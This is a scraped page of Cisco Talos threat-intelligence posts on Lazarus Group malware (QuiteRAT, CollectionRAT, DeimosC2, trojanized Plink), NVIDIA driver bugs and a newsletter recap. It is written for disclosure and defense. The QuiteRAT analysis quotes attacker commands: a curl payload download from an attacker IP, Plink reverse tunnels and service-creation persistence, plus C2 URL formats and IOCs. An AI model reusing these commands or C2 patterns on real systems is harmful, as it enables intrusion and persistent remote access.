**Typical Filename:** rcx4d83.tmp  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Pykspa::tpd

Years into these games’ histories, attackers are still creating “Fortnite” and “Roblox”-related scams

Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.

Thursday, August 24, 2023 08:08

*   In the Lazarus Group’s latest campaign, which we detailed in a recent blog, the North Korean state-sponsored actor is exploiting CVE-2022-47966, a ManageEngine ServiceDesk vulnerability to deploy multiple threats. In addition to their “QuiteRAT” malware, which we covered in the blog, we also discovered Lazarus Group using a new threat called “CollectionRAT.”  
    
*   CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Based on our analysis, CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.  
    
*   Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.  
    
*   One such example of this trend is Lazarus Group’s use of the open-source DeimosC2 framework. The DeimosC2 agent we discovered in this campaign is an ELF binary, indicating Lazarus’ intention to deploy this implant during initial access against compromised Linux endpoints.

**Lazarus Group reuses infrastructure in continuous assault on enterprises**

In the new Lazarus Group campaign we recently disclosed, the North Korean state-sponsored actor continues to use much of the same infrastructure despite those components being well-documented by security researchers over the years. Their continued use of the same tactics, techniques and procedures (TTPs) — many of which are publicly known — highlights the group’s confidence in their operations and presents opportunities for security researchers. By tracking and analyzing these reused infrastructure components, we identified the new CollectionRAT malware detailed in this report.

As mentioned, Lazarus Group remains highly active, with this being their third documented campaign in less than a year. In September 2022, Talos published details of a Lazarus Group campaign targeting energy providers in the United States, Canada and Japan. This campaign, enabled by the successful exploitation of the Log4j vulnerability, heavily employed a previously unknown implant we called “MagicRAT,” along with known malware families VSingle, YamaBot and TigerRAT, all of which were previously attributed to the threat actor by Japanese and Korean government agencies.

Some of the TTPs used in another Lazarus Group campaign in late 2022 have been highlighted by WithSecure. This report illustrated Lazarus Group exploiting unpatched Zimbra devices and deploying a remote access trojan (RAT) similar to MagicRAT. This is the same RAT Talos observed being deployed after Lazarus Group’s exploitation of ManageEngine ServiceDesk, which we detailed in an earlier blog, -known as “QuiteRAT.” QuiteRAT and MagicRAT are both based on the Qt framework and have similar capabilities, but QuiteRAT is likely an attempt to compact MagicRAT into a smaller and easier to deploy malicious implant based on its size.

  
In addition to this recent campaign illustrating how active Lazarus Group remains, this activity also serves as another example of the actor reusing the same infrastructure. We discovered that QuiteRAT and the open-source DeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in their preceding campaign from 2022 that deployed MagicRAT. This infrastructure was also used for commanding and controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink utility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to compromised endpoints. Lazarus has been known to use dual-use utilities in their operations, especially for reverse tunneling such as Plink and 3proxy.

Some CollectionRAT malware from 2021 was signed with the same code-signing certificate as Jupiter/EarlyRAT (also from 2021), a malware family listed in CISA’s advisory detailing recent North Korean ransomware activity.

The connections between the various malware are depicted below:

**Lazarus evolves malicious arsenal with CollectionRAT and DeimosC2**

CollectionRAT consists of a variety of standard RAT capabilities, including the ability to run arbitrary commands and manage files on the infected endpoint. The implant consists of a packed Microsoft Foundation Class (MFC) library-based Windows binary that decrypts and executes the actual malware code on the fly. Malware developers like using MFC even though it’s a complex, object-oriented wrapper. MFC, which traditionally is used to create Windows applications’ user interfaces, controls and events, allows multiple components of malware to seamlessly work with each other while abstracting the inner implementations of the Windows OS from the authors. Using such a complex framework in malware makes human analysis more cumbersome. However, in CollectionRAT, the MFC framework has just been used as a wrapper/decrypter for the actual malicious code.

CollectionRAT initially gathers system information to fingerprint the infection and relay it to the C2 server. It then receives commands from the C2 server to perform a variety of tasks on the infected system. The implant has the ability to create a reverse shell, allowing it to run arbitrary commands on the system. The implant can read and write files from the disk and spawn new processes, allowing it to download and deploy additional payloads. The implant can also remove itself from the endpoint when directed by the C2.

Implant's configuration strings.

The preliminary system information is sent to the C2 server to register the infection, which subsequently issues commands to the implant.

Initial check-in over HTTP to C2 server.

**CollectionRAT and its link to EarlyRAT**

Analyzing CollectionRAT indicators of compromise (IOCs) enabled us to discover links to EarlyRAT, a PureBasic-based implant that security research firm Kaspersky recently attributed to the Andariel subgroup. We discovered a CollectionRAT sample signed with the same certificate used to sign an older version of EarlyRAT from 2021. Both sets of samples used the same certificate from “OSPREY VIDEO INC.” with the same serial number and thumbprint. The EarlyRAT malware was also listed in CISA’s advisory from February 2023 highlighting ransomware activity conducted by North Korea against healthcare and critical infrastructure entities across the world. Kaspersky reported that EarlyRAT is deployed via the successful exploitation of the Log4j vulnerability. EarlyRAT is also known as the “Jupiter” malware. DCSO CyTec’s blog contains more details about Jupiter.

Common OSPREY VIDEO INC certificate from 2021 used to sign CollectionRAT and EarlyRAT

Lazarus Group appears to be shifting its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase. Lazarus Group previously relied on the use of custom-built implants such as MagicRAT, VSingle, DTrack, and Yamabot as a means of establishing persistent initial access on a successfully compromised system. These implants are then instrumented to deploy a variety of open-source or dual-use tools to perform a multitude of malicious hands-on-keyboard activities in the compromised enterprise network. These include proxy tools,, credential-dumping tools such as Mimikatz and post-compromise reconnaissance and pivoting frameworks such as Impacket. However, these tools have primarily been used in the post-compromise phase of the attack. This campaign is one such instance where the attackers used the DeimosC2 open-source C2 framework as a means of initial and persistent access. DeimosC2 is a GoLang-based C2 framework supporting a variety of RAT capabilities similar to other popular C2 frameworks such as Cobalt Strike and Sliver.

**DeimosC2 analysis**

Apart from the many dual-use tools and post-exploitation frameworks found on Lazarus Group’s hosting infrastructure, we discovered the presence of a new implant that we identified as a beacon from the open-source DeimosC2 framework. Contrary to most of the malware found on their hosting infrastructure, the DeimosC2 implant was a Linux ELF binary, indicating the intention of the group to deploy it during the initial access on Linux-based servers.

The implant itself is an unmodified copy of the regular beacon that the DeimosC2’s C2 server produces when configured with the required parameters. It contains the standard URI paths that remain the same as the configuration provided in an out-of-the-box configuration of the implant. The lack of heavy customization of the implant indicates that the operators of DeimosC2 in this campaign may still be in the process of getting used to and adopting the framework to their needs.

Configuration in the DeimosC2 implant.

Trend Micro has an excelelnt analysis of the DeimosC2, but the implants typically have various RAT capabilities such as:

*   Execute arbitrary commands on the endpoint.
*   Credential stealing and registry dumping.
*   Download and upload files from C2.
*   Shellcode execution.
*   Uninstallation of the implant.

**Malicious Plink**

Another open-source tool we observed Lazarus Group using is the reverse tunneling tool PuTTY Link (Plink). In the past, we’ve observed Lazarus Group use Plink to establish remote tunnel using commands such as:

pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] <Remote_IP>

The option -R forwards port 8118 on 127.0.0.1 to the remote server on port 18118.

However, we found that Lazarus Group has now started generating malicious Plink binaries out of PuTTY’s source code to embed the reverse tunnel command strings in the binary itself. The following figure shows a comparison of:

*   The malicious Plink binary on the left contains the reverse tunnel command with the switches in the format:

Plink.exe -N -R 4443:127.0.0.1:80 -P 443 -l [username]-pw [password] <Remote_IP>

*   A benign Plink binary on the right was used in 2022 by Lazarus as part of their hands-on-keyboard activity.

A malicious copy of Plink (left) compared to a benign version (right), both used by Lazarus.

The malicious Plink will also create a mutex named “Global\\WindowsSvchost” before establishing the remote tunnel to ensure that only one connection is made between the local machine and C2.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat: **62248, 62253-62255.**

**IOCs**

IOCs for this research can also be found in our GitHub repository here.

**Hashes  
****QuiteRAT**

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6  

**CollectionRAT**

db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984

773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df  

**DeimosC2**

05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d  

**Trojanized Plink**

e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe

**Networks IOCs  
**

146\[.\]4\[.\]21\[.\]94

109\[.\]248\[.\]150\[.\]13

108\[.\]61\[.\]186\[.\]55:443

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/comp\[.\]dat

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/log\[.\]php

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/logs\[.\]php

hxxp\[://\]ec2-15-207-207-64\[.\]ap-south-1\[.\]compute\[.\]amazonaws\[.\]com/resource/main/rawmail\[.\]php

hxxp\[://\]109\[.\]248\[.\]150\[.\]13/EsaFin\[.\]exe

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/boards/boardindex\[.\]php

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/editor/common/cmod

Lazarus Group's infrastructure reuse leads to discovery of new malware

This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.

Thursday, August 24, 2023 08:08

*   Cisco Talos discovered the North Korean state-sponsored actor Lazarus Group targeting internet backbone infrastructure and healthcare entities in Europe and the United States. This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.  
    
*   In this campaign, the attackers began exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) five days after PoCs for the exploit were publicly disclosed to deliver and deploy a newer malware threat we track as “QuiteRAT.” Security researchers first discovered this implant in February, but little has been written on it since then.  
    
*   QuiteRAT has many of the same capabilities as Lazarus Group’s better-known MagicRAT malware, but its file size is significantly smaller. Both implants are built on the Qt framework and include capabilities such as arbitrary command execution.  
    
*   Lazarus Group’s increasing use of the Qt framework creates challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult compared to threats created using simpler programming languages such as C/C++, DOT NET, etc. Furthermore, since Qt is rarely used in malware development, machine learning and heuristic analysis detection against these types of threats are less reliable.

**Lazarus Group compromises internet backbone infrastructure company in Europe  
**

In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in Europe to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access. The successful exploitation triggered the immediate download and execution of a malicious binary via the Java runtime process. We observed Lazarus Group use the cURL command to immediately deploy the QuiteRAT binary from a malicious URL:

curl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe

The IP address 146\[.\]4\[.\]21\[.\]94 has been used by Lazarus since at least May 2022.

A successful download of the binary leads to the execution of the QuiteRAT binary by the Java process, resulting in the activation of the implant on the infected server. Once the implant starts running, it sends out preliminary system information to its command and control (C2) servers and then waits on the C2 to respond with either a command code to execute or an actual Windows command to execute on the endpoint via a child cmd.exe process. Some of the initial commands executed by QuiteRAT on the endpoint are for reconnaissance:

Command

Intent

C:\\windows\\system32\\cmd.exe /c systeminfo | findstr Logon

Get logon server name (machine name). System Information Discovery \[T1082\]

C:\\windows\\system32\\cmd.exe /c ipconfig | findstr Suffix

Domain name for the system. Domain discovery \[T1087/002\]

There is no in-built persistence mechanism in QuiteRAT. Persistence for the implant is achieved via the registry by issuing the following command to QuiteRAT:

C:\Windows\system32\cmd[.]exe /c sc create WindowsNotification type= own type= interact start= auto error= ignore binpath= cmd /K start c:\users\public\notify[.]exe

A typical infection chain looks like this:

**Lazarus Group evolves malicious arsenal with QuiteRAT**

QuiteRAT is a fairly simple remote access trojan (RAT). It consists of a compact set of statically linked Qt libraries along with some user-written code. The Qt framework is a platform for developing cross-platform applications. However, it is immensely popular for developing Graphical User Interface in applications. Although QuiteRAT, just like MagicRAT, uses embedded Qt libraries, none of these implants have a Graphical User Interface. .As seen with Lazarus Group’s MagicRAT malware, the use of Qt increases the code complexity, making human analysis harder. Using Qt also makes machine learning and heuristic analysis detection less reliable, since Qt is rarely used in malware development.

Based on QuiteRAT’s technical characteristics, including the usage of the Qt framework, we assess that this implant belongs to the previously disclosed MagicRAT family. QuiteRAT was briefly discussed in WithSecure’s report from early 2023. The new campaign we’re disclosing exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) — which has a Kenna risk score of 100 out of 100 — to deploy QuiteRAT.

The implant initially gathers some rudimentary information about the infected endpoint, including MAC addresses, IP addresses, and the current user name of the device. This information is then arranged in the format:

<MAC_address><IP_address>[0];<MAC_address><IP_address>[1];...<MAC_address><IP_address>[n];<username>

The resulting string is then used to calculate an MD4 hash, which is then used as the infection identifier (victim identifier) while conversing with the C2 server.

All the networking-related configurations, such as the C2 URLs and extended URI parameters, are encoded and stored in the malware. The strings are XOR’ed with 0x78 and then base64 encoded. This technique is in line with WithSecure’s analysis from earlier this year.

Configuration strings encoded in the malware.

The URL to communicate with the C2 is constructed as follows with the following extended URI parameters:

Parameter names

Values

Description

mailid

<12 chars from MD4>

The first 12 characters from the MD4 of the information gathered from the endpoint (described earlier)

action

“inbox” = send check beacon  
“sent” = data is being sent to C2

Signifies the action being taken

body

<base64\_xorred\_data>

Data to be sent to C2.

param

<Internal/Local IP address>

The internal/LAN IP address of the infected endpoint.

session

<rand>

Pseudo-random number generated by the implant.

The URL for the HTTP GET to obtain inputs from the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&**action=inbox**&param=<Internal/Local_IP_address>&session=<rand>

Data is also sent to the C2 using the HTTP GET VERB as well. The URL for the HTTP GET to send data to the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&**action=sent&body=<base64_xorred_data>**param=<Internal/Local_IP_address>&session=<rand>

Any data sent to the C2 is utmost 0x400 (1,024) bytes in length. If the output of a command executed on the endpoint by the implant is larger than 1,024 bytes, the implant appends the < No Pineapple! > marker at the end of the data.

The User-Agent used during communications by the implant is

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0

The malware also has the ability to run a ping command on a random IP address that it generates on the fly. The request is usually executed using the command <compspec_path>\cmd.exe /c <IP_Address> -n 18 &:  

Ping command being constructed by the implant including the octets for a random IP.

The implant can also receive a command code “sendmail” along with a numeric value from the C2 server. This value is then used by the implant to Sleep for a specific period of time (in minutes) before it begins talking to the C2 server again. The adversaries likely use this functionality to keep the implant dormant for longer periods of time while ensuring continued access to the compromised enterprise network.

The implant also has the ability to receive a second URL from the current C2 server via the command code receivemail. The implant will then reach out to the second URL to receive commands and payloads from the server to execute on the infected system.

We have seen the following versions of QuiteRAT in the wild. We are only able to share one of the file hashes at this time, which is included in the IOCs section:

QuiteRAT binary name

Compile date

notify.exe (32bit)

May 30, 2022

acres.exe

July 22, 2022

acres.exe (64bit)

July 25, 2022

The latest version of Lazarus Group’s older MagicRAT implant observed in the wild was compiled in April 2022. This is the last version of MagicRAT that we know of. The use of MagicRAT’s derivative implant, QuiteRAT, beginning in May 2023 suggests the actor is changing tactics, opting for a smaller, more compact Qt-based implant.

**QuiteRAT vs MagicRAT**

QuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging around 18MB in size, QuiteRAT is a much much smaller implementation, averaging around 4 to 5MB in size. This substantial difference in size is due to Lazarus Group incorporating only a handful of required Qt libraries into QuiteRAT, as opposed to MagicRAT, in which they embedded the entire Qt framework. Furthermore, while MagicRAT consists of persistence mechanisms implemented in it via the ability to set up scheduled tasks, QuiteRAT does not have a persistence capability and needs to be issued one by the C2 server to achieve continued operation on the infected endpoint. This is another contributing factor to the smaller size of QuiteRAT.

There are similarities between the implants that indicate that QuiteRAT is a derivative of MagicRAT. Apart from being built on the Qt framework, both implants consist of the same abilities, including running arbitrary commands on the infected system. Both implants also use base64 encoding to obfuscate their strings with an additional measure, such as XOR or prepending hardcoded data, to make it difficult to decode the strings automatically. Additionally, both implants use similar functionality to allow them to remain dormant on the endpoint by specifying a sleep period for them by the C2 server.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCs**

IOCs for this research can also be found at our Github repository here.  

**Hashes  
****QuiteRAT**

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6  

**Networks IOCs  
**

146\[.\]4\[.\]21\[.\]94

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/comp\[.\]dat

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/log\[.\]php

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/logs\[.\]php

hxxp\[://\]ec2-15-207-207-64\[.\]ap-south-1\[.\]compute\[.\]amazonaws\[.\]com/resource/main/rawmail\[.\]php

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

The driver is vulnerable to memory corruption if an adversary sends a specially crafted shader packer, which can lead to a memory corruption problem in the driver.

Wednesday, August 23, 2023 12:08

_Piotr Bania of Cisco Talos discovered the vulnerabilities mentioned in this post._

Cisco Talos recently disclosed three vulnerabilities in the shader functionality of the NVIDIA D3D10 driver that works with NVIDIA’s graphics cards.

The driver is vulnerable to memory corruption if an adversary sends a specially crafted shader packer, which can lead to a memory corruption problem in the driver.

All three issues, identified as TALOS-2023-1719 (CVE-2022-34671), TALOS-2023-1720 (CVE-2022-34671) and TALOS-2023-1721 (CVE-2022-34671), have a CVSS severity rating of 8.5 out of 10.

An attacker could exploit these vulnerabilities from guest machines running virtualization environments (such as VMware, QEMU and VirtualBox) to perform a guest-to-host escape, as we’ve illustrated with previous vulnerabilities in NVIDIA graphics drivers.

Talos' research also indicates that these vulnerabilities could be triggered from a web browser using WebGL and WebAssembly. Our researchers triggered these issues from a HYPER-V guest using the RemoteFX feature, leading to the execution of vulnerable code on the HYPER-V host (inside the rdvgm.exe process). Microsoft recently deprecated RemoteFX, but older machines may still use this software.

Talos worked with NVIDIA to ensure these vulnerabilities are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

For Snort coverage (SIDs 61386, 61387, 61398, 61399, 61410 and 61411) that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

Three vulnerabilities in NVIDIA graphics driver could cause memory corruption

Adversaries are increasingly writing malware in programming languages such as Go, Rust, or Nim, because they present challenges to investigators using reverse-engineering tools designed to work best against the C family of languages.
It’s often difficult for reverse engineers examining non-C languages to differentiate between the malware author&

Tuesday, August 22, 2023 05:08

Adversaries are increasingly writing malware in programming languages such as Go, Rust, or Nim, because they present challenges to investigators using reverse-engineering tools designed to work best against the C family of languages.

It’s often difficult for reverse engineers examining non-C languages to differentiate between the malware author’s code and the language’s standard library code. In the vast majority of cases, Hex-Ray’s Interactive Disassembler (IDA) has the out-of-the-box capability to identify library functions or generate custom Fast Library Identification and Recognition Technology (FLIRT) signatures and solve the issue.

But for Nim, generating signatures is distinctly more difficult. Cisco Talos is excited to announce a new project to find an automated way to generate custom FLIRT signatures for IDA, which led to a talk at Recon.cx 2023 and a guest blog on Hex-Rays. This blog describes the technical details of our research.

Generating FLIRT signatures for Nim and other non-C programming languages

Unsurprisingly, it seems like AI was the talk of the town.

Thursday, August 17, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

I had a significant amount of FOMO last week seeing everyone out in Vegas. (I was happy to not get conference crud sickness, but it seems like I missed a great time otherwise.)

But, as anyone who works with me could guess, I was following closely online through social media and news reporting. If you’re in the same boat as me and couldn’t attend BlackHat or DEF CON in person, I wanted to use this space to recap what I felt were the top stories and headlines coming out of the various new research that was published, talks, interviews and more.

Unsurprisingly, it seems like AI was the talk of the town. One panel, which featured the former Cyber Czar in the Obama administration, promised coming action from the Biden administration around AI and its intersection with cybersecurity, including an executive order that apparently will be as broad as earlier orders around the U.S.’ broader approach to security.

There were many other panels and talks around AI, along with questions about whether the technology has plateaued after so many companies developed their own ChatGPT-like.

I was also fascinated by several interviews and talks from an FBI official about distributed denial-of-service attacks. I’ve written before about how there’s a renewed interest in DDoS attacks recently, especially those targeting high-profile companies and games.

Two high-ranking government officials gave a joint talk at Black Hat where they said the majority of DDoS attacks are the result of a dispute over business transactions or good ‘ol fashioned video game beef.

The same presenters gave additional details on how the FBI prioritizes stopping DDoS attacks. Chances are, if you’re a bad actor who makes the news for DDoS attacks, the federal government is not far behind.

I also always love the crazy vulnerabilities or hacking methods that come out of both these conferences. A highlight for me was a group of researchers who found a way to hijack one of the most popular automatic card shufflers (fitting for Vegas) to the point that someone could know the order of cards ahead of time in a gambling game.

I’m not quite sure what the actual attack surface is here because the potential hacker would need to install a tiny physical USB device into the shuffler, and I don’t think any casino worker would be thrilled to see you crawling around on the floor, but I do always love to see the downside of putting a USB port on everything.

And there was the brief, but confusing, saga at DEFCON about the pop-up notifications iPhone users were getting asking people to pair with a rogue Apple TV. Turns out it was a harmless prank from one of the attendees, who just wanted to drive home the point that it’s important to really turn off Bluetooth all the way, and not just click the little button in the Control Center.

Lastly, we wanted to thank Viktor Zhora, the deputy chairman and chief digital transformation officer at the State Service of Special Communication and Information Protection for Ukraine, for taking the time to say “Hi” to us on the show floor. He specifically took time out of his day to make sure he could meet Matt Olney, who’s been one of our leaders in helping support Ukraine. Viktor was a speaker at BlackHat and had a very busy schedule of media appearances, so we were flattered that he made sure to see Matt.

**The one big thing**

Since AI was already the talk of the town at Black Hat and DEF CON, we wanted to continue the conversation around tehse tools and the implications on cybersecurity. As one of our incident responders wrote in the latest in our “On the Radar” series, AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders. The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.

**Why do I care?**

AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. For defenders, though, AI also opens the door to new defensive tactics and tools, so it’s important to see the positives and negatives of AI in security.

**So now what?**

There is no real action for the average user to take at this point, but I feel this piece is a good opportunity for everyone to take a step back about what we currently know, and don’t know, about AI and its intersection with security.

**Top security headlines of the week**

**Two police precincts in the U.K. had mistakenly been leaking the personal information of individuals connected to crimes for years.** The UK's Norfolk and Suffolk police constabularies disclosed that, between April 2021 and March 2022, the information was accidentally attached to crime statistics distributed as part of Freedom of Information Act (FOIA) requests. The data includes personally identifiable information related to witnesses, suspects and victims of a variety of crimes, including domestic violence, assaults, thefts and hate crimes. The forces say they are now contacting more than 1,200 people who may have been affected. Representatives from the two departments said in a statement that, “Strenuous efforts have been made to determine if the data released has been accessed by anyone outside of policing. At this stage we have found nothing to suggest that this is the case.” (CSO Online, Politico)

Viktor Zhora, one of Ukraine’s top cybersecurity officials, said at Black Hat that **his country is taking several steps to document what may constitute war crimes committed by Russian state-sponsored actors.** Zhora said that attacks affecting critical infrastructure and communications for civilians could fall under such umbrellas and his team is actively collecting evidence as the kinetic military conflict continues. Speaking alongside Zhora, Jen Easterly, the U.S.’ top cybersecurity official, said the U.S. has learned several lessons from Russia’s invasion of Ukraine, including the importance of assistance from private cybersecurity companies. (CyberScoop, The Record)

**Several years’ worth of Intel chips contains a newly discovered flaw known as “Downfall,”** which is like the Meltdown and Spectre bugs from several years ago. Identified as CVE-2022-40982, the issue could allow the CPU to “unintentionally reveal internal hardware registers to software,” according to a write-up from Google’s security research team. Proof of concept code shows that an attacker could use Downfall to steal encryption keys from other users on a given server and other sensitive data. Downfall affects most CPUs in Intel's 6th through 11th-generation Core lineups for consumer PCs. Most of the affected devices were sold starting in 2015 and may still be available in systems today. Intel’s patch for the issue negatively affects the performance of the CPUs, with some studies finding that performance could dip to 40 percent. (Ars Technica, PC World)

**Can’t get enough Talos?**

*   Cisco XDR: from detection and response to continuity after a cyberattack
*   As Ransomware Gangs Shift To Data Extortion, Some Adopt A New Tactic: ‘Customer Service’
*   Talos Takes Ep. #150: What's the difference between data theft extortion and ransomware?

**Upcoming events where you can find Talos**

**Grace Hopper Celebration (Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6  
**MD5:** 4c9a8e82a41a41323d941391767f63f7  
**Typical Filename:** !!Mreader.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Generic::sheath

Recapping the top stories from Black Hat and DEF CON

A major area of impact of AI tools in cybercrime is the reduced need for human involvement in certain aspects of cybercriminal organizations.

Monday, August 14, 2023 08:08

*   AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders.
*   The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.
*   Defenders and law enforcement can use AI to strengthen cybersecurity and counteract illicit activities.

The past decade has seen a massive adoption in machine learning and artificial intelligence. An increasing number of organizations have been leveraging such technologies to automate their operations and make their products and services better.

Despite the extensive use of machine learning (ML) and artificial intelligence (AI) by organizations for some time now, many users have first interacted with such technologies over the past few months in the form of generative AI helping users to generate text, code, images and other digital assets with the provision of limited input. The likes of ChatGPT have brought AI to the top of the public’s mind, fueling an intensive race for AI development.

